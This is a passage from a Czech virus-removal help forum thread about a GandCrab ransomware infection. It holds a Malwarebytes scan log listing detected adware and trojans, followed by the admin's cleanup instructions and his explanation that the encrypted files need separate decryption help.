PUP.Optional.SpyHunter, C:\USERS\MEGRET-TPC\DOWNLOADS\SPYHUNTER-INSTALLER (1).EXE, Žádná uživatelská akce, [3918], [552698],1.0.7793
Adware.Elex.ShrtCln, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\SyncData.sqlite3, Žádná uživatelská akce, [260], [454711],1.0.7793
Adware.Elex.ShrtCln, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Žádná uživatelská akce, [260], [454711],1.0.7793
PUP.Optional.MailRu, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\SyncData.sqlite3, Žádná uživatelská akce, [243], [454830],1.0.7793
PUP.Optional.MailRu, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Žádná uživatelská akce, [243], [454830],1.0.7793
PUP.Optional.Babylon, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\SyncData.sqlite3, Žádná uživatelská akce, [330], [455059],1.0.7793
PUP.Optional.Babylon, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Žádná uživatelská akce, [330], [455059],1.0.7793
PUP.Optional.SpyHunter, C:\USERS\MEGRET-TPC\DOWNLOADS\SPYHUNTER-INSTALLER (3).EXE, Žádná uživatelská akce, [3918], [552698],1.0.7793
PUP.Optional.WiperSoft, C:\USERS\MEGRET-TPC\DOWNLOADS\WIPERSOFT-INSTALLER.EXE, Žádná uživatelská akce, [4418], [340923],1.0.7793
Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)
WMI: 0
(Nebyly zjištěny žádné škodlivé položky)
(end)
www.malwarebytes.com
-Podrobnosti logovacího souboru-
Datum skenování: 11.11.18
Čas skenování: 13:33
Logovací soubor: 05848752-e5ae-11e8-892c-309c23650ed5.json
-Informace o softwaru-
Verze: 3.6.1.2711
Verze komponentů: 1.0.482
Aktualizovat verzi balíku komponent: 1.0.7793
Licence: Zkušební
-Systémová informace-
OS: Windows 10 (Build 17134.165)
CPU: x64
Systém souborů: NTFS
Uživatel: FRNDA\MeGret-TPC
-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Spuštění skenování: Ruční
Výsledek: Dokončeno
Skenované objekty: 307119
Zjištěné hrozby: 28
Hrozby umístěné do karantény: 0
Uplynulý čas: 1 min, 6 sek
-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Zakázáno
Heuristika: Povoleno
Potenciálně nežádoucí program: Detekovat
Potenciálně nežádoucí modifikace: Detekovat
-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)
Modul: 0
(Nebyly zjištěny žádné škodlivé položky)
Klíč registru: 11
PUP.Optional.SpyHunter, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SpyHunter5, Žádná uživatelská akce, [3918], [552679],1.0.7793
Spyware.Socelars, HKU\S-1-5-21-819675408-2753461327-3771956256-1001\SOFTWARE\{6D187CC8-35BD-47F6-8760-D406AA1927B1}, Žádná uživatelská akce, [6268], [584328],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{1EA8098C-25F5-46DE-A412-1C6E1B81EDFC}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{1EA8098C-25F5-46DE-A412-1C6E1B81EDFC}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{63FF5D84-F332-3C55-1873-E2C6DE6F96AA}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{0D7125B3-7656-4619-A37A-395D9A914DC0}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{0D7125B3-7656-4619-A37A-395D9A914DC0}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{36E954AC-8F78-691F-B718-D4CE7E4BCF08}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.StartPage.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{92146086-56B7-4E0D-9EA3-C78832C285BA}, Žádná uživatelská akce, [14195], [555894],1.0.7793
Trojan.StartPage.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{92146086-56B7-4E0D-9EA3-C78832C285BA}, Žádná uživatelská akce, [14195], [555894],1.0.7793
Trojan.StartPage.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{B4B9A496-1465-614B-42E6-E9FACFD9FDCB}, Žádná uživatelská akce, [14195], [555894],1.0.7793
Hodnota v registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)
Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)
Adresář: 1
Trojan.Agent, C:\PROGRAMDATA\BLOGGER, Žádná uživatelská akce, [402], [552313],1.0.7793
Soubor: 16
PUP.Optional.WiperSoft, C:\USERS\MEGRET-TPC\DESKTOP\WIPERSOFT.LNK, Žádná uživatelská akce, [4418], [340921],1.0.7793
PUP.Optional.SpyHunter, C:\PROGRAM FILES\ENIGMASOFT\SPYHUNTER\SPYHUNTER5.EXE, Žádná uživatelská akce, [3918], [552678],1.0.7793
PUP.Optional.SpyHunter, C:\PROGRAMDATA\ENIGMASOFT LIMITED\SH5_INSTALLER.EXE, Žádná uživatelská akce, [3918], [552679],1.0.7793
Trojan.Agent, C:\PROGRAMDATA\BLOGGER\BLOGGER.EXE, Žádná uživatelská akce, [402], [552313],1.0.7793
PUP.Optional.SpyHunter, C:\PROGRAMDATA\ENIGMASOFT LIMITED\SH5_INSTALLER.EXE, Žádná uživatelská akce, [3918], [552698],1.0.7793
PUP.Optional.WiperSoft, C:\WINDOWS\SYSTEM32\WIPERRM.EXE, Žádná uživatelská akce, [4418], [584847],1.0.7793
PUP.Optional.SpyHunter, C:\USERS\MEGRET-TPC\DOWNLOADS\SPYHUNTER-INSTALLER (2).EXE, Žádná uživatelská akce, [3918], [552698],1.0.7793
PUP.Optional.SpyHunter, C:\USERS\MEGRET-TPC\DOWNLOADS\SPYHUNTER-INSTALLER (1).EXE, Žádná uživatelská akce, [3918], [552698],1.0.7793
Adware.Elex.ShrtCln, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\SyncData.sqlite3, Žádná uživatelská akce, [260], [454711],1.0.7793
Adware.Elex.ShrtCln, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Žádná uživatelská akce, [260], [454711],1.0.7793
PUP.Optional.MailRu, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\SyncData.sqlite3, Žádná uživatelská akce, [243], [454830],1.0.7793
PUP.Optional.MailRu, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Žádná uživatelská akce, [243], [454830],1.0.7793
PUP.Optional.Babylon, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\SyncData.sqlite3, Žádná uživatelská akce, [330], [455059],1.0.7793
PUP.Optional.Babylon, C:\USERS\MEGRET-TPC\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Žádná uživatelská akce, [330], [455059],1.0.7793
PUP.Optional.SpyHunter, C:\USERS\MEGRET-TPC\DOWNLOADS\SPYHUNTER-INSTALLER (3).EXE, Žádná uživatelská akce, [3918], [552698],1.0.7793
PUP.Optional.WiperSoft, C:\USERS\MEGRET-TPC\DOWNLOADS\WIPERSOFT-INSTALLER.EXE, Žádná uživatelská akce, [4418], [340923],1.0.7793
Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)
WMI: 0
(Nebyly zjištěny žádné škodlivé položky)
(end)
-
Rudy
- Site Admin
- Příspěvky: 118272
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: GANDCRAB V5.0.4
Smažte všechny nalezené položky a restartujte.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: GANDCRAB V5.0.4
...stale exe,,fotky,,nic,,nejdou otevrit
https://uloz.to/!7FRrzthplMYK/fotky-jpg
https://uloz.to/!ZvwQ6ZvEd6CS/screen-jpg
posilam screeny
https://uloz.to/!7FRrzthplMYK/fotky-jpg
https://uloz.to/!ZvwQ6ZvEd6CS/screen-jpg
posilam screeny
-
Rudy
- Site Admin
- Příspěvky: 118272
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: GANDCRAB V5.0.4
Máte v PC tzv. Ransomware, který způsobuje kryptování některých souborů. Vyčistil jsem vám PC od malware a teď je třeba dekryptovat všechny soubory, které byly napadeny. V tom vám ale nepomohu, je k tomu třeba (pokud to vůbec bude možné) přímý vstup do PC. To ale nemá naše fórum právně ošetřeno, takže vám doporučím naše kolegy zde: https://neslape.cz/?utm_campaign=neslap ... ium=banner . Pro příště vám doporučím všechny uložené dokumenty zálohovat.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: GANDCRAB V5.0.4
Něco jsem o tom četl a na YouTube také něco o tom je,,děkuji alespoň za to co jste pro mě udělal a posílám něco finančního na podporu fóra...možná to mám zalohovane na google...mrknu,,ostatní věci bych mohl stáhnout...ještě na tom druhém disků něco bude...zatím to je asi nejhorší co jsem v PC měl,,hlavně přemýšlím odkud se to tam vzalo..pěkná pakárna...
-
Rudy
- Site Admin
- Příspěvky: 118272
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: GANDCRAB V5.0.4
Ransomware řádí asi tak 3roky a je to opravdu to nejhorší v poslední době, nepočítám-li průniky do finančních systémů. Nemáte zač a za příspěvek děkujeme. 
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Přispějete na provoz fóra?